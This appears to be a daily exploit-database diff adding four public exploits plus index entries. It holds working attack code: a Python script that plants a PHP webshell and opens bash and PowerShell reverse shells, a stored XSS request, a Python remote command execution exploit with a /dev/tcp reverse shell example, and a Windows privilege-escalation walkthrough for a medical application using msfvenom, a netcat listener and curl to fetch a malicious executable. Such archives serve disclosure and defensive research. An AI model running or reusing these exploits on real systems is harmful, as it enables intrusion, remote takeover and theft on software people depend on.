DB: 2021-12-02

4 changes to exploits/shellcodes

MilleGPG5 5.7.2 Luglio 2021 - Local Privilege Escalation
Online Enrollment Management System in PHP and PayPal 1.0 - 'U_NAME' Stored Cross-Site Scripting
Advanced Comment System 1.0 - Remote Command Execution (RCE)

exploits/php/webapps/50556.py

@@ -49,11 +49,8 @@ class Exploit:
 
             }
 
-         #Creates user "bypass" and upload a simple webshell without
+         #Creates user "bypass" and upload a simple webshell without authentication
-authentication
+        request = self.session.post(url,data=data,headers=self.headers,files={"image":(self.shell_name +'.php',"<?=`$_GET[cmd]`?>")})
-        request = self.session.post(url,
-data=data,headers=self.headers,files={"image":(self.shell_name
-+'.php',"<?=`$_GET[cmd]`?>")})
         time.sleep(3)
         if (request.status_code == 200):
             print('[*] The user and webshell were created\n')
@@ -69,8 +66,7 @@ data=data,headers=self.headers,files={"image":(self.shell_name
 
             #Use a payload in bash to get a reverse shell
             payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+self.LHL+'+0>%261"'
-            execute_command =
+            execute_command = self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload
-self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload
 
             try:
                 request_rce = requests.get(execute_command)
@@ -86,11 +82,9 @@ self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload
             time.sleep(3)
 
             #Use a payload in powershell to get a reverse shell
-            payload =
+            payload = """powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+self.HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0)
-"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+self.HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0)
 {%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()"""""
-            execute_command =
+            execute_command = self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload
-self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload
 
 
             try:
@@ -105,8 +99,7 @@ self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload
 
 
 def get_args():
-    parser = argparse.ArgumentParser(description='Laundry Booking
+    parser = argparse.ArgumentParser(description='Laundry Booking Management System')
-Management System')
     parser.add_argument('-t', '--target', dest="target", required=True,
 action='store', help='Target url')
     parser.add_argument('-s', '--shell_name', dest="shell_name",

exploits/php/webapps/50557.txt

@@ -0,0 +1,68 @@
+# Exploit Title: Online Enrollment Management System in PHP and PayPal 1.0 - 'U_NAME' Stored Cross-Site Scripting
+# Date: 2021-08-31
+# Exploit Author: Tushar Jadhav
+# Vendor Homepage:  https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/12914/online-enrollment-management-system-paypal-payments-phpmysqli.html
+# Version: 1.0
+# Tested on: Windows 11
+# Contact: https://www.linkedin.com/in/tushar-jadhav-7a43b4171/
+# CVE: CVE-2021-40577
+
+=============================================================================================================================
+
+Stored Cross-site scripting(XSS):
+
+Stored attacks are those where the injected script is permanently stored on
+the target servers,
+such as in a database, in a message forum, visitor log, comment field, etc.
+The victim then retrieves the malicious script from the server when it
+requests the stored information.
+Stored XSS is also sometimes referred to as Persistent XSS.
+
+==============================================================================================================================
+
+Attack vector:
+
+This vulnerability can result in the attacker can injecting the XSS payload
+in the User Registration section. Each time the admin login or basic user
+Login in the admin panel, the XSS triggers and attacker can able to steal
+the cookie according to the crafted payload.
+
+===============================================================================================================================
+
+Vulnerable Parameters: Name
+
+===============================================================================================================================
+
+Steps for reproducing:
+
+1. Go to add users section
+2. fill in the details. & put <script>alert(document.cookie)</script>
+payload in Name parameter.
+3. Once we click on save, We can see the XSS has been triggered.
+
+================================================================================================================================
+
+Request :
+
+POST /onlineenrolmentsystem/admin/user/controller.php?action=add HTTP/1.1
+Host: 192.168.1.205:81
+Content-Length: 133
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://192.168.1.205:81
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer:
+http://192.168.1.205:81/onlineenrolmentsystem/admin/user/index.php?view=add
+Accept-Encoding: gzip, deflate
+Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
+Cookie: PHPSESSID=uonlna5pmhqh9shnj8t6oqc2g3
+Connection: close
+
+deptid=&U_NAME=%3Cscript%3Ealert%28window.origin%29%3C%2Fscript%3E&deptid=&U_USERNAME=test&deptid=&U_PASS=root&U_ROLE=Registrar&save=
+
+===================================================================================================================================

exploits/php/webapps/50559.py

@@ -0,0 +1,65 @@
+# Exploit Title: Advanced Comment System 1.0 - Remote Command Execution (RCE)
+# Date: November 30, 2021
+# Exploit Author: Nicole Daniella Murillo Mejias
+# Version: Advanced Comment System 1.0
+# Tested on: Linux
+
+#!/usr/bin/env python3
+
+# DESCRIPTION:
+# Commands are Base64 encoded and sent via POST requests to the vulnerable application, the
+# response is filtered by the randomly generated alphanumeric string and only command output
+# is displayed.
+#
+# USAGE:
+# Execute the script and pass the command to execute as arguments, they can be quoted or unquoted
+# If any special characters are used, they should be quoted with single quotes.
+#
+# Example:
+#
+#    python3 acspoc.py uname -a
+#    python3 acspoc.py 'bash -i >& /dev/tcp/127.0.0.1/4444 0>&1'
+
+import sys
+import base64
+import requests
+import random
+
+def generate_string(size):
+    str = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
+    return ''.join(random.choice(str) for i in range(size))
+
+def exploit(cmd):
+
+    # TODO: Change the URL to the target host
+    url = 'http://127.0.0.1/advanced_comment_system/index.php'
+
+    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
+
+    encoded_cmd = base64.b64encode(cmd)
+
+    delimiter = generate_string(6).encode()
+
+    body = b'ACS_path=php://input%00&cbcmd='
+    body += encoded_cmd
+    body += b'&<?php echo " '
+    body += delimiter
+    body += b': ".shell_exec(base64_decode($_REQUEST["cbcmd"])); die ?>'
+
+    try:
+        result = requests.post(url=url, headers=headers, data=body)
+    except KeyboardInterrupt:
+        print("Keyboard interrupt detected.")
+        sys.exit()
+
+    if f'{delimiter.decode()}: ' in result.text:
+        position = result.text.find(f"{delimiter.decode()}:") + len(f"{delimiter.decode()}: ")
+
+        if len(result.text[position:]) > 0:
+            print(result.text[position:])
+        else:
+            print(f"No output from command '{cmd.decode()}'")
+            print(f"Response size from target host: {len(result.text)} bytes")
+
+if __name__ == "__main__":
+    exploit(' '.join(sys.argv[1:]).encode())

exploits/windows/local/50558.txt

@@ -0,0 +1,126 @@
+# Exploit Title: MilleGPG5 5.7.2 Luglio 2021 (x64) - Local Privilege Escalation
+# Date: 2021-07-19
+# Author: Alessandro 'mindsflee' Salzano
+# Vendor Homepage: https://millegpg.it/
+# Software Homepage: https://millegpg.it/
+# Software Link: https://www.millegpg.it/download/MilleGPGInstall.exe
+# Version: 5.7.2
+# Tested on: Microsoft Windows 10 Enterprise x64
+
+MilleGPG5 is a Class 1 Medical Device registered with "Ministero della Salute".
+
+Vendor: Millennium S.r.l. / Dedalus Group / Dedalus Italia S.p.a.
+
+Affected version: MilleGPG5 5.7.2
+
+# Details
+# By default the Authenticated Users group has the modify permission to MilleGPG5 folders/files as shown below.
+# A low privilege account is able to rename the mysqld.exe file located in bin folder and replace
+# with a malicious file that would connect back to an attacking computer giving system level privileges
+# (nt authority\system) due to the service running as Local System.
+# While a low privilege user is unable to restart the service through the application, a restart of the
+# computer triggers the execution of the malicious file.
+
+(1) Impacted services.
+Any low privileged user can elevate their privileges abusing these services:
+
+C:\Program Files\MilleGPG5\MariaDB\bin\mysqld.exe
+C:\Program Files\MilleGPG5\GPGService.exe
+
+
+    Details:
+
+
+SERVICE_NAME: MariaDB-GPG
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : "C:\Program
+Files\MilleGPG5\MariaDB\bin\mysqld.exe" MariaDB-GPG
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : MariaDB-GPG
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+------
+
+SERVICE_NAME: GPGOrchestrator
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : "C:\Program Files\MilleGPG5\GPGService.exe"
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : GPG Orchestrator
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+(2) Folder permissions.
+Insecure folders permissions issue:
+
+
+C:\Program Files\MilleGPG5\MariaDB\bin BUILTIN\Users:(I)(OI)(CI)(F)
+                                       NT SERVICE\TrustedInstaller:(I)(F)
+                                       NT
+SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
+                                       NT AUTHORITY\SYSTEM:(I)(F)
+                                       NT
+AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
+BUILTIN\Administrators:(I)(F)
+BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
+BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
+                                       CREATOR OWNER:(I)(OI)(CI)(IO)(F)
+                                       APPLICATION PACKAGE
+AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
+                                       APPLICATION PACKAGE
+AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
+                                       APPLICATION PACKAGE
+AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
+                                       APPLICATION PACKAGE
+AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
+                                ...[SNIP]...
+---------------
+
+C:\Program Files\MilleGPG5 BUILTIN\Users:(OI)(CI)(F)
+                           NT SERVICE\TrustedInstaller:(I)(F)
+                           NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
+                           NT AUTHORITY\SYSTEM:(I)(F)
+                           NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
+                           BUILTIN\Administrators:(I)(F)
+BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
+                           BUILTIN\Users:(I)(RX)
+                           BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
+                           CREATOR OWNER:(I)(OI)(CI)(IO)(F)
+                           APPLICATION PACKAGE AUTHORITY\ALL
+APPLICATION PACKAGES:(I)(RX)
+                           APPLICATION PACKAGE AUTHORITY\ALL
+APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
+                           APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED
+APPLICATION PACKAGES:(I)(RX)
+                           APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED
+APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
+
+
+                                # Proof of Concept
+
+1. Generate malicious .exe on attacking machine
+    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe
+
+2. Setup listener and ensure apache is running on attacking machine
+    nc -lvp 4242
+    service apache2 start
+
+3. Download malicious .exe on victim machine
+    type on cmd: curl http://192.168.1.102/mysqld_evil.exe -o "C:\Program Files\MilleGPG5\MariaDB\bin\mysqld_evil.exe"
+
+4. Overwrite file and copy malicious .exe.
+    Renename C:\Program Files\MilleGPG5\MariaDB\bin\mysqld.exe > mysqld.bak
+    Rename downloaded 'mysqld_evil.exe' file in mysqld.exe
+
+5. Restart victim machine
+
+6. Reverse Shell on attacking machine opens
+    C:\Windows\system32>whoami
+    whoami
+    nt authority\system

files_exploits.csv

@@ -11421,6 +11421,7 @@ id,file,description,date,author,type,platform,port
 50517,exploits/windows/local/50517.txt,"Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Local Privilege Escalation",1970-01-01,"Marcio Mendes",local,windows,
 50541,exploits/linux/local/50541.c,"Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)",1970-01-01,"Ujas Dhami",local,linux,
 50545,exploits/windows/local/50545.txt,"HTTPDebuggerPro 9.11 - Unquoted Service Path",1970-01-01,"Aryan Chehreghani",local,windows,
+50558,exploits/windows/local/50558.txt,"MilleGPG5 5.7.2 Luglio 2021 - Local Privilege Escalation",1970-01-01,"Alessandro Salzano",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -44645,3 +44646,5 @@ id,file,description,date,author,type,platform,port
 50554,exploits/multiple/webapps/50554.txt,"orangescrum 1.8.0 - 'Multiple' Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Hubert Wojciechowski",webapps,multiple,
 50555,exploits/php/webapps/50555.txt,"opencart 3.0.3.8 - Sessjion Injection",1970-01-01,"Hubert Wojciechowski",webapps,php,
 50556,exploits/php/webapps/50556.py,"Laundry Booking Management System 1.0 - Remote Code Execution (RCE)",1970-01-01,"Pablo Santiago",webapps,php,
+50557,exploits/php/webapps/50557.txt,"Online Enrollment Management System in PHP and PayPal 1.0 - 'U_NAME' Stored Cross-Site Scripting",1970-01-01,"Tushar Jadhav",webapps,php,
+50559,exploits/php/webapps/50559.py,"Advanced Comment System 1.0 - Remote Command Execution (RCE)",1970-01-01,"Murillo Mejias",webapps,php,